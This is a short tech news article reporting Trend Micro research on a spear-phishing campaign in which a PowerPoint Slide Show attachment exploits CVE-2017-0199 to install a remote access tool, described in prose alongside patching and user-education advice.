A new malware campaign is making its way into businesses through a malicious PowerPoint email attachment, Trend Micro research has found. According to blog post, CVE-2017-0199 traditionally utilizes RTF documents, and this is the first time it has been seen to abuse PowerPoint Slide Show in the wild.

The malware comes in an email that appears to be from a company that manufactures cables. The email tells the recipient to see the order and asks for them to quote cost, insurance, and freight (CIF) and free on board (FOB) prices as well. Due to the targeted nature of the email, as the criminals are typically going after electronics companies, the post said, the email is being considered a spear phishing attack.

In the sample email provided by Trend Micro, the attachment is titled PO-483848.ppsx. In that case, PO could be short for purchase order, in an effort to increase the perceived legitimacy of the PowerPoint file.

SEE: 10 ways to minimize fileless malware infections

If the victim opens the attached file, there will be no purchase order, not even any fake text attempting to be one. It simply reads: CVE-2017-8570. That’s the name of another Microsoft vulnerability, the post said, but not the one that this particular malware is targeting.

PowerPoint then initializes a script moniker and runs the malicious payload, the post said. If successful, it will download an XML file from the internet. Some JavaScript code in that XML file runs a PowerShell command that downloads and executes a remote access tool.

At this point, the attackers will be able to run remote commands on the victim’s machine. “The tool’s capabilities are quite comprehensive, and includes a download & execute command, a keylogger, a screen logger, and recorders for both webcam and microphone,” the post said.

The biggest issue for this given attack is the fact that it comes by way of a PowerPoint file. Most current detection methods focus on the RTF delivery method, so that means attackers utilizing the PPSX files could have an easier time avoiding antivirus detection, the post said.

To protect against attacks like this one, businesses should make sure that their systems are properly patched and updated to account for any known vulnerabilities. Also, users should be regularly educated on proper security hygiene and email etiquette.

The 3 big takeaways for TechRepublic readers

1. A new spear phishing campaign is using PowerPoint files to exploit the CVE-2017-0199 and deliver malware to victims.
2. If a user clicks on the attached file, it will run a remote access tool, and could allow attackers access to a user’s keystrokes, screen, webcam, and microphone.
3. IT should keep systems update and educate users on the proper behavior regarding attachments and emails from outside parties.

Also see